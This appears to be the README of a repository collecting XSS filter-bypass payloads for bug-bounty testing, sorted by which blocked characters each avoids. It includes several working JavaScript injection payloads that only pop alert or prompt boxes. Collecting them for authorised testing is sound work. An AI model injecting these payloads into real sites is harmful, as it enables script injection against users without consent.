XSS Payload without Anything.

When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.

Let's collect a lot of thoughts and solve our problems.

It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.

without char: () , '

XSS Payload

// usedchar: 
// author: 
// description: 

I have selected special characters that are often blocked.

( ) 
{ } 
, 
"
'
`
[ ]
\ 
/ 
; 
+ 
. 
=

(template): () {} , " ' backtick [] \ / ; + . =

on Github.com

1. Ctrl + F >
2. find your problem char
3. XSS

on hahwul.com comming soon

coming soon

location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]

onerror=eval;throw'alert\x2845\x29';

prompt`45`

location='javaScriPt:alert\x2845\x29'

([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()

[45].some.alert()

Set.constructor`alert\x2845\x29`

Add issue form or pull Request

XSS Payload:
WithOut: 
Description: 

or ...

Tweet with me @hahwul